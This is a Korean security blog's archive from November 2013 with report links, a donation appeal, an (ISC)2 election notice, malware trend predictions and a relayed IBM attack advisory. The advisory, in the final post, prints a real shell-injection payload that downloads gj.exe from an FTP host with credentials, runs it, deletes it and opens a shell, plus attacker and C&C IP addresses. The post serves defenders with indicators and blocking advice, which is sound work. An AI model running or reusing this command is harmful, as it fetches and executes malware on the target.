2013년 11월 27일 수요일

Gartner, Magic Quadrant for Application Security Testing. 2 July 2013

Gartner, Magic Quadrant for Application Security Testing. 2 July 2013

http://www.gartner.com/technology/reprints.do?id=1-1GUOVQS&ct=130703

아래한글 임의코드 실행 취약점 보안 업데이트 권고

아래한글 임의코드 실행 취약점 보안 업데이트 권고

http://www.krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20126

IBM X-Force 2013 상반기 동향 및 위험 보고서 - CISO의 관점에서 바라본 보안 환경

IBM X-Force 2013 상반기 동향 및 위험 보고서 - CISO의 관점에서 바라본 보안 환경 https://www.facebook.com/download/220406538137326/WGE03021KRKO_Exec%20Summary_kor.pdf

ZDNET, 12월 3일. Security Next Conference 2014 - Security Strategy Core Keyword

2013 해킹방지 워크샵 - 공동의 무지, 공동의 오류, 공동의 책임.

프로그램 사전등록하기

2013년 11월 22일 금요일

CIOCISO 11월호

CIOCISO 11월호 보기

후원, 도서, 세미나, 강의 티켓, 재능 기부 및 지식 나눔 기다립니다. ^^

안녕하세요. SecurityPlus의 박형근입니다.

SecurityPlus 기부 및 후원을 통해 활발히 SUA 세미나 및 스터디 그룹 운영 및 다양한 보안 활동에 활용되고 있습니다.

소중하신 뜻을 모아, 헛되이 사용되지 않도록 엄격히 관리되고 있으며, 후원금 이외에도 도서, 세미나 장소, 유료 세미나/컨퍼런스의 무료 티켓 및 강의 등을 통한 재능 기부와 지식 나눔도 받고 있습니다.

언제든지 나눔의 뜻 있다면 helpdesk@securityplus.or.kr 로 문의 주시기 바랍니다.

감사합니다.

* 기부 및 후원을 위한 SecurityPlus 입금 계좌번호:

한국씨티은행 175-25842-263
예금주: 박형근

참고: 입금 시 보내시는 분의 통장에는 박형근이 아니라,
박형근(SecurityPlus)라고 기재되게 됩니다.

아직 비영리 법인이 아니라서 소득 공제나 절세는 안 되지만,
SecurityPlus 활동을 지지한다면, 개인과 기업 모두 기부 및
후원 부탁드립니다.

* SecurityPlus 및 관련 모든 문의 연락처:

사무국 e-Mail: helpdesk@securityplus.or.kr

PDF 구조 및 악성코드 분석 (동영상 포함)

PDF 구조 및 악성코드 분석 (동영상 포함) http://www.nurilab.com/?p=357

오라클 자바와 함께 IBM 자바에 대한 보안 패치도 잊지 마세요. ^^

Oracle 자바 보안 패치가 발표되었다면,
IBM 자바에 대한 보안 패치도 함께 고려하고 계획되어야 합니다.
꼭 잊지 마세요.
http://www.ibm.com/developerworks/java/jdk/alerts/

IBM 보안 연구소가 밝히는 2014년 가장 위험한 악성코드 동향 예측

IBM 보안 연구소가 밝히는 2014년 가장 위험한 악성코드 동향 예측

1. 악성코드의 소스코드 유출이 새로운 악성코드의 제작과 배포 주기를 더 빠르게 할 것이다.

2. 모바일 악성코드의 기본 기능으로써 모바일 SMS 포워딩 기능을 탑재할 것이고, 스미싱을 포함한 메세지 기반 공격이 가중될 것입니다.

3. 보다 향상된 탐지 기법과 대응 방안을 무력화하기 위해 오래된 이전 악성코드 기술들을 다시 채택하게 될 것입니다.

4. 계정 탈취를 위한 악성코드들이 지문인식을 기본 탑재한 디바이스들을 우회하기 위해 피해자의 디바이스 상에서 악의적인 행위를 하는 형태로 변화할 것입니다.

5. 악성코드 연구자들을 회피하는 다양한 기술들(암호화, 가상화 기술, 안티 디버깅 등)이 좀더 널리 사용될 것입니다.

2013년 11월 16일 토요일

(ISC)2 이사회 선거 – 온라인상에서 투표해 주십시오.

전자 투표는 지금 시작되며 오는 2013 121 7:00
a.m.-한국시각 (30 NOVEMBER 2013 AT 5:00 p.m. EST-미국시각)
종료됩니다.
 
(ISC)² 이사회 임원은 전세계의 학계, 민간 기업, 정부
기관을 대표하는 정보보안 전문가들로 구성됩니다.
임원진들은 조직에게 경영운영과 통찰력을 제공하고,
자격을 갖춘 지원자들에게 자격증을 수여하며, (ISC)²
윤리 강령 준수를 집행하게 됩니다.
 
올해에는 5석의 임원직이 오픈됩니다. 8명의 후보자가
이사회 임원진으로부터 공개지지를 받았습니다.
에서 확인하실 있습니다.(로그인이 요망됨).
 
이사회 임원 선거 투표 방법:
 
1.    투표는 (ISC)² 웹사이트 www.isc2.org 보안이 유지된
페이지를 통해 전자식으로 이루어 집니다. 모든
회원님들께서는 한표만 행사하실 있습니다.;
전자식이 아닌 대면 투표는 가능하지 않습니다.
2.    2013 1116 시작되는 투표에 참여하기 위해서는,
온라인 https://www.isc2.org/MemberHome.aspx    에서 투표를
완료하시면 됩니다.
3.    User ID Password등록을 통해 회원웹사이트에 로그인
하시도록 안내받으실 것입니다.
4.    후보자들의 자세한 정보는 후보자들의 이름을
클릭하시면 확인하실 있습니다.
5.    귀하의 소중한 한표를 행사하기 위해서는,
최대5명의 후보까지 체크 표시를 하시거나 직접 이름을
넣으실 있습니다. 후보자에 한해서 최대 1표만
집계됩니다.
6.    직접 이름을 적어넣는 투표방식을 선택할 경우,
회원 기록에 나와 있는 정확한 이름과 동일하게 기재될
있도록 주의 부탁드립니다. 철자를 확인하는
과정에서 누구에게 투표하는지 명확하지 않아 의심이
가는 경우, 이는 집계되지 않습니다!  (. James E. Brown vs.
Jimmy Brown vs. J. Brown vs. James Borwn)
 
전자 투표는 지금 시작되며 오는 2013 121 7:00
a.m.-한국시각 (30 NOVEMBER 2013 AT 5:00 p.m. EST-미국시각)
종료됩니다.
 
임원 선거 과정의 자세한 사항은 다음에서 확인하실
 
다른 궁금한 사항이 있으시면, membersupport@isc2.org
연락부탁드립니다.
 
감사합니다.
(ISC)2 Management

2013년 11월 15일 금요일

산업기술유출 예방 교육 홍보 동영상


한국산업기술보호협회 제작 '산업기술유출 예방 교육 홍보 동영상' - 교육용 자료로 활용하면 좋을 것 같습니다. ^^b

2013년 11월 14일 목요일

2013 산업보안 아이디어 공모전에서 SecurityPlus의 대학생 커뮤니티인 S.U.A의 우수상 수상!


안녕하세요. SecurityPlus입니다. 
 
한국산업기술보호협회에서 주최한 2013 산업보안 아이디어 공모전 대학(원)부에서 SecurityPlus의 대학생 커뮤니티인 S.U.A(SecurityPlus Union Academy) 대표로 출전한 이찬우, 구희정, 김채경, 안재열님께서 우수상을 수상하셨습니다.
진심으로 축하드립니다.^^

감사합니다.


2013년 11월 5일 화요일

IBM 보안 연구소로부터의 긴급 조언

- 현재 IBM 보안 연구소는 72.26.194.138 로부터의 활발한 공격 징후에 대해 전세계적으로 추적 중입니다. 이 IP 주소로부터 특정 IP 대역에 대한 80 포트를 탐색하고 있으며, 연결되는 경우 바로 쉘 코드 인젝션을 시도합니다.

- 이 공격이 성공하는 경우, 공격당한 컴퓨터로부터 FTP 프로토콜을 통해 31.204.152.37 주소로 접속하여 gj.exe 파일을 다운로드 받고 실행합니다. 그리고 추가 명령을 대기하며 IRC 채널로 접속합니다.

- 현재 72.26.194.138 주소는 mail.sermonshare.com, mail.radioworship.net, web1.sermon.net와 web02.sermmonshare.com 으로 주소 변환이 되고 있고, 31.204.152.37는 mijn-site.be, jinraforest.be, faker.eu, euroveiling.com, busimatch.com 혹은 6개의 다른 도메인 주소로 해석되고 있습니다. 현재 내외부로 접속하는 주소 중 위 주소가 보인다면 잠재적으로 악성코드에 노출되었을 가능성이 있습니다.

현재 이 공격에 사용된 쉘 인젝션 코드는 다음과 같습니다.

unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT]31.204.152.37/gj.exe;perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i';\x0a$daemo

이 공격의 IRC 서버이며 C&C 서버로 추정되는 IP 주소는 83.170.75.200입니다.

- 따라서 IBM 보안 연구소에서는 72.26.194.138, 31.204.152.37와 83.170.75.200 IP 주소에 대해 방화벽 룰에서 내외부 모든 방향에 대해 차단할 것을 권고드립니다.